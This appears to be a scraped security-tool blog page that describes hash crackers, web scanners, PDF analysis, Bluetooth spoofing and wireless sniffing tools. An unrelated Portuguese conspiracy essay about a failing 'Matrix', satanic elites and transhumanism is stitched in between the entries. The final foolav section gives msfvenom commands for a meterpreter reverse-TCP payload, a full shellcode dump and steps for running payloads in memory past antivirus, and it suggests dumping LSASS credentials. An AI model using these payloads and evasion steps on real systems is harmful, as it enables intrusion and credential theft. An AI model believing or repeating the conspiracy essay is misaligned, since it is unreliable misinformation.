Rainbow Tables Hash Cracker - RainbowCrack

RainbowCrack uses time-memory tradeoff algorithm to crack hashes. It differs from the hash crackers that use brute force algorithm. A brute force hash cracker generate all possible plain-texts and compute the corresponding hashes on the fly, then compare the hashes with the hash to be cracked. Once a match is found, the plain-text is found.

RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. It crack hashes with rainbow tables. RainbowCrack uses time-memory trade-off algorithm to crack hashes. It differs from brute force hash crackers.

A brute force hash cracker generate all possible plain-texts and compute the corresponding hashes on the fly, then compare the hashes with the hash to be cracked. Once a match is found, the plain-text is found. If all possible plain-texts are tested and no match is found, the plaintext is not found. With this type of hash cracking, all intermediate computation results are discarded.

A time-memory trade-off hash cracker need a pre-computation stage, at the time all plaintext/hash pairs within the selected hash algorithm, charset, plain-text length are computed and results are stored in files called rainbow table. It is time consuming to do this kind of computation. But once the one time pre-computation is finished, hashes stored in the table can be cracked with much better performance than a brute force cracker.

In this project, we focus on the development of optimized time-memory trade-off implementation. GPU acceleration is another key feature of RainbowCrack software. By offloading most runtime computation to NVIDIA GPU, overall hash cracking performance can be improved further.

Several TB of generated rainbow tables for LM, NTLM, MD5 and SHA1 hash algorithms are listed in this page


Features:

ºFull time-memory tradeoff tool suites, including rainbow table generation, sort, conversion ºand lookup
ºSupport rainbow table of any hash algorithm
ºSupport rainbow table of any charset
ºSupport rainbow table in raw file format (.rt) and compact file format (.rtc)
ºComputation on multi-core processor support
ºComputation on GPU (via NVIDIA CUDA technology) support
ºComputation on multi-GPU (via NVIDIA CUDA technology) support
ºRuns on Windows operating systems
ºWindows XP 32-bit / 64-bit
ºWindows Vista 32-bit / 64-bit
ºWindows 7 32-bit / 64-bit
ºWindows 8 32-bit / 64-bit
ºRuns on Linux operating systems (x86 and x86_64)
ºUnified rainbow table file format on all supported operating systems
ºCommand line user interface
ºGraphics user interface (Windows only)

Download RainbowCrack

Read More

Web Application Testing - Vega

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: Javascript

What does it do?

Vega runs in two modes of operation: as an automated scanner, and as an intercepting proxy.

Automated scanner

The automated scanner automatically crawls websites, extracting links, processing forms, and running modules on possible injection points it discovers. These modules can do things like automatically submit requests that fuzz parameters, for example, to test for things like cross-site scripting (XSS) or SQL injection.

Intercepting proxy

The intercepting proxy allows for detailed analysis of browser-application interaction. When enabled, the proxy listens on localhost as a proxy server. When a browser uses the Vega proxy, requests and responses are visible to Vega. Vega can be told to set ”breakpoints”, interception criteria for outgoing requests (from the browser) or incoming responses (from the server). These requests and responses are held in a state where they are editable until released.

Scanning proxy

Vega can also fuzz parameters and actively test pages that match the target scope as you visit them through the proxy.

Response processing

Vega supports modules that process responses, typically looking for information (”grep” modules). Response processing modules can process responses received by either the scanner or the proxy.

Shared knowledge base

Beneath the hood is a database where information, including requests and responses, can be shared among components.

Workspaces

Vega stores information about the current and past scans in a “workspace”. Clearing the workspace will remove all scan data, including alerts and saved requests/responses. To do so, select the “File” menu item and click on “Reset Current Workspace”.

Preferences

Vega scans websites recursively, building an internal representation of the site in a tree-like data structure comprised of entities known as “path state nodes”. Path state nodes can be directories, files, or files with POST or GET parameters. Complex websites can result in long scans and large path state data structures, so Vega offers configurable parameters that limit the scan scope in the scanner preferences. To access these parameters, click on the Window menu item and choose “Preferences”. There are two sets of preferences associated with the scanner: Scanner preferences and Scanner debugging. Select Scanner debugging.

Download Vega

Read More

PDF Analysis Tool - peepdf

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not.

The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it’s possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart of this it’s able to create new PDF files and to modify existent ones.


Functionalities:

Analysis:

ºDecodings: hexadecimal, octal, name objects
ºMore used filters
ºReferences in objects and where an object is referenced
ºStrings search (including streams)
ºPhysical structure (offsets)PDF Analysis Tool: peepdf
ºLogical tree structure
ºMetadata
ºModifications between versions (changelog)
ºCompressed objects (object streams)
ºAnalysis and modification of Javascript (Spidermonkey): unescape, replace, join
ºShellcode analysis (Libemu python wrapper, pylibemu)
ºVariables (set command)
ºExtraction of old versions of the document
ºEasy extraction of objects, Javascript code, shellcodes (>, >>, $>, $>>)
ºChecking hashes on VirusTotal

Creation/Modification:

ºBasic PDF creation
ºCreation of PDF with Javascript executed wen the document is opened
ºCreation of object streams to compress objects
ºEmbedded PDFs
ºStrings and names obfuscation
ºMalformed PDF output: without endobj, garbage in the header, bad header…
ºFilters modification
ºObjects modification

Execution modes:

ºSimple command line execution
ºPowerful interactive console (colorized or not)
ºBatch mode

Download peedf

Read More

PHP Vulnerability - Hunter

This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.

PHP Vulnerability Hunter is aware of many different types of vulnerabilities found in PHP applications, from the most common such as cross-site scripting and local file inclusion to the lesser known, such as user controlled function invocation and class instantiation.

PHP Vulnerability Hunter

ºArbitrary command execution
ºArbitrary file read/write/change/rename/delete
ºLocal file inclusion
ºArbitrary PHP execution
ºSQL injection
ºUser controlled function invocatino
ºUser controlled class instantiation
ºReflected cross-site scripting (XSS)
ºOpen redirect
ºFull path disclosure



Scan Phases

1. Initialization Phase

During this phase, interesting function calls within each code file are hooked, and if code coverage is enabled the code is annotated. Static analysis is performed on the code to detect inputs.

2. Scan Phase

This is where the bugs are uncovered. PHP Vulnerability Hunter iterates through its different scan plugins and plugin modes, scanning every file within the targeted application. Each time a page is requested, dynamic analysis is performed to discover new inputs and bugs.

3. Uninitialization

Once the scan phase is complete, all of the application files are restored from backups made during the initialization phase.

Download Hunter

Read More

O Programa da Matrix Está Falhando - ''O Que Você Precisa Saber''

Ele é programação ultrapassada e os engenheiros do engano não podem mais mantê-lo funcionando. As mudanças vibracionais estão superando as suas capacidades. Você sabe quando o seu celular ou o software do seu computador fica desatualizado e novos programas não podem funcionar neles ? é a mesma coisa. Os imitadores da criação não podem manter o sistema operacional atual por mais tempo em face dessa mudança Universal.

Eles estão enlouquecendo.

Basta olhar para o desespero que estamos testemunhando, manobras da polícia, militares violentos e são apenas um aspecto A maior pista está vindo do uso anteriormente incremental e agora hiperbólico de mentiras monstruosas que estão se tornando tão transparentes e inacreditáveis para qualquer pessoa desperta, ainda que existam os apatetados em transe que engolem qualquer coisa, mas nós estamos testemunhando uma crise diante de nossos olhos

Se você não pode vê-la, olhe novamente.

Quer Uma Prova ?

Primeiro de tudo você está na mentalidade errada, se você está olhando apenas para dados ou provas para o seu cérebro esquerdo, embora estejam lá fora para aqueles que podem ver. Quando passamos a entender o funcionamento da vibração de nossa realidade holográfica tudo adquire novas dimensões e nos abre para a compreensão dessas noções mais esotéricas.

Aqueles com corações que podem ver e sentir isso. Digo corações porque muito do que precisamos compreender, ou pelo menos ter o controle é intuitivo. Tomando todas as informações e conectando os pontos da experiência espiritual pessoal juntos, pintamos quadros muito claros, só precisamos confiar no que estamos vendo e aprendendo. Quando exploramos estas realidades que estamos sentindo, começamos a perceber como elas estão se manifestando.

Proibir a livre expressão, atirar em civis sem nenhum motivo, óbvias mega mentiras nas notícias, guerras sem fim possível, deliberado envenenamento, fome e emburrecimento da população ? Só não vê quem não quer.

Esta é uma espécie de simbiose consciente ou espiritual que estamos vivenciando. Todas elas trabalhando em conjunto. Mas ignorar o espiritual e a metafísica como “evidência” em conjunto de tais manifestações óbvias foi o que levou este mundo ao seu estado atual. Civilizações iluminadas anteriores e tribos conectadas com a Terra levaram isto a sério. Nosso paradigma atual imposto não faz nada do tipo.

A Analogia do Computador

É como um software expirado ou desatualizado. Seus programas não podem mais seguir funcionando com as mudanças que o cosmos está trazendo para o nosso planeta e nossa raça. É exatamente isto. Enquanto eles, literalmente, se safaram com assassinatos por milênios e estão trabalhando furiosamente para fazer rodar os seus “programas” em tantos níveis, antes que o tempo acabe. Desculpe Charlie, mas você foi substituído, ou devo dizer “super semeado”. O novo paradigma atualizado está assumindo rapazes. É apenas uma questão de tempo até todo o seu sistema ruim falhar.

A mudança está acontecendo no seu controle de nível mais baixo na capacitação em massa e na transcendência além da rede, para onde já lançou a humanidade.

Isso deve ser um inferno frustrante para estes velhacos. Imagine uma coisa em que você está tentando envolver todos os sentidos possíveis segue se transformando diante de seus olhos. Eles podem vomitar programa após programa da matrix, mas suas placas de petri descobertas apenas encontram maneiras de sobreviverem e crescerem. Que ironia o Universo tem.

Daí a Agenda Transhumana – Coisas Que Pensam Que Podem Controlar
A humanidade está ficando fora de controle a seus olhos. A todo momento estamos sendo habilitados pelo nosso próprio despertar e compromisso resultante da verdade, mas também por uma mudança vibracional fundamental que está acontecendo. Não existe um salvador, não há batalha estelar galáctica. É nós, e uma evolução da consciência orgânica no nível mais profundo com a vida, ampliando e envolvendo o Universo.

Despertando com a própria criação.

Qualquer um que despertou em qualquer grau entende que tudo está interligado. Mesmo a física “moderna” já chegou a conclusão desta realidade, enquanto ao mesmo tempo o pensamento dominante da matrix ignora as profundas ramificações. Estamos todos interligados e não apenas como uma raça, mas com a Terra e o cosmos de uma forma tão fundamental que é um divisor de águas. Embora isto fosse conhecido por eras, o nosso modelo de controle atual não pode sequer começar a reconhecer esse fato. Para esses oligarcas e intelectuais maníacos auto nomeados, não importa que poderes eles estão convocando, a verdade é algo bem além de sua compreensão aviltada.

Está fora da sua liga.

Claro, eles têm seus rituais satânicos e exploram outras entidades dimensionais, mas é uma brincadeira de criança comparado com a verdadeira imagem do nosso todo poderoso criativo Universo. Que vivem em rebelião contra essa força é uma realidade conhecida há milênios e até mesmo aludido por tradições espirituais e ensinamentos xamânicos nativos a tantas Eras. Trazer esse conhecimento a todos na “Terra” é outra história.

É por isto que a agenda do transhumanismo é tão importante para eles. Esta fusão do homem com a máquina tem estado em obras há um longo tempo. Cortar a ligação com a nossa humanidade ao curto-circuitar a criação humana é o próximo passo óbvio para esses pretensos controladores. Aprovada, eles fizeram-na uma moda passageira e a aceitação cuidadosamente preparada de tal tendência, mas ela vai fritar e morrer no ferro-velho da existência temporal. Ela não pode ficar, não tem como diante de tal campo de força criativa.

O tempo vai confirmar isto, como já aconteceu com civilizações anteriores fora do curso.

Isso é Real ?

Cabe a nós. Temos tudo a nosso favor. Mas a nossa vontade e ações precisam estar alinhadas com esta transição. Nós podemos ignorá-la ou responder. A santidade do nosso livre-arbítrio não pode ser violada. Ou nós remamos e cavalgamos a onda ou ela deixa de funcionar em nós e, talvez, se dissipe nas margens do tempo por falta de reconhecimento ou resposta. E todo o ciclo pode necessitar ser repetido. Não é um destino agradável.

Eu não sei.

Eu sei que eu não vou voltar. Eu terminei com essa insanidade e estou fazendo a minha parte para mudar as coisas desta vez. Se todos nós fizermos, isto não vai se repetir, mas o tempo dirá. Muito poucos parecem estar dispostos a responder, mesmo que as suas vidas, a dos seus filhos e as vidas dos seus netos estejam em jogo. Falam sobre derrota auto imposta e debilitação.

De qualquer maneira, a matrix vai entrar em colapso, mas a verdadeira civilização do amor, paz, harmonia e abundância aguarda manifestação.

Está na hora ?

Acho que sim. É a hora para mim.
E quanto a você ?
Com amor Zen


By OffensiveSec Open Your Mind

Read More

Automatic Bluetooth Spoofing - Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Features

ºClone and log Bluetooth device information
ºGenerate a random new Bluetooth profile
ºChange Bluetooth profile every X seconds
ºSpecify device information for Bluetooth interface
ºSelect device to clone from scan log


Automatic Bluetooth Spoofing: Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).

Spooftooph has several options for Bluetooth device information modification:

Option 1: Continuously scan an area for Bluetooth devices. Make a selection on which device in the list to clone. This option also allows for logging of the scanned devices.

Option 2: Randomly generate and assign valid Bluetooth interface information. The class and address are randomly generated and the name is derived from a list of the top 100 most common names in US and the type of device. For example if the randomly generated class is a phone, SpoofTooph might generate the name “Bob’s Phone”.

Option 3: Specify the name, class, and address a user wishes for the Bluetooth interface to have.

Option 4: Read in the log of previous scans and select a device to clone. Users can also manually add Bluetooth profiles to these log files.

Option 5: Incognito mode. Scan for and clone new devices at user assigned intervals.

This tool is heavily based on bdaddr (by Marcel Holtmann) and hciconfig (by Qualcomm Incorporated, Maxim Krasnyansky, and Marcel Holtmann) from BlueZ.



Usage

To modify the Bluetooth adapter, spooftooth must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.

spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.

spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.

spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.

spooftooph -i hci0 -r file.csv

5) Clone a random devices info in range every X seconds.


spooftooph -i hci0 -t 10

Download Spooftooph

Read More

Wireless Network Monitoring Tool - Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones (see below), there’s only one supported wireless hardware available as packet source.


Wireless Network Monitoring Tool

ºEthereal/Tcpdump compatible data logging
ºAirsnort compatible weak-iv packet logging
ºNetwork IP range detection
ºBuilt-in channel hopping and multicard split channel hopping
ºHidden network SSID decloaking
ºGraphical mapping of networks
ºClient/Server architecture allows multiple clients to view a single
ºKismet server simultaneously
ºManufacturer and model identification of access points and clients
ºDetection of known default access point configurations
ºRuntime decoding of WEP packets for known networks
ºNamed pipe output for integration with other tools, such as a layer3 IDS like Snort
ºMultiplexing of multiple simultaneous capture sources on a single Kismet instance
ºDistributed remote drone sniffing
ºXML output
ºOver 20 supported card types

Kismet differs from other wireless network detectors in working passively. Namely, without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and to associate them with each other. It is also the most widely used and up to date open source wireless monitoring tool.

An explanation of the headings displayed in Kismet. Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.

Kismet features the ability to log all sniffed packets and save them in a tcpdump/Wireshark or Airsnort compatible file format. Kismet can also capture “Per-Packet Information” headers. Kismet also features the ability to detect default or “not configured” networks, probe requests, and determine what level of wireless encryption is used on a given access point.

In order to find as many networks as possible, kismet supports channel hopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big holes between channels (for example, 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage with this method is that it will capture more packets because adjacent channels overlap.


Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.

Download Kismet

Read More

Pentest - Security Cheatsheets

Security Cheatsheets

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Requirements

The only requirement to use these cheatsheets is for cheat to be installed.

How to Use

In order to use these cheatsheets, the cheatsheets in this repository need to go into ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

Download Security Cheatsheets

Read More

Antivirus Evasion - foolav

foolav

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.


Usage steps

1. prepare your payload (x86), i.e.

calc:  msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you dont really need to use any encoder or characters blacklisting, it will work anyway)

meterpreter:  msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf

2. copy payload file [executable-name-without-exe-extension].mf in the same directory as executable payload running calc.exe generated using above command:  # calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84 


3. once executable is run, payload file will be parsed, loaded into separate thread and executed in memory:

Hints


ºx86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86  architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64  processes. After that, load kiwi will load x86_64 version making it possible to access juicy  contents of LSASS process memory :)

º.mf payload file can be obfuscated - parser will ignore every character other than \xHH  hexdecimal sequences. This means, it can append your payload to almost any file, hide it  between the lines or even add your own comments, example:

Download foolav

Read More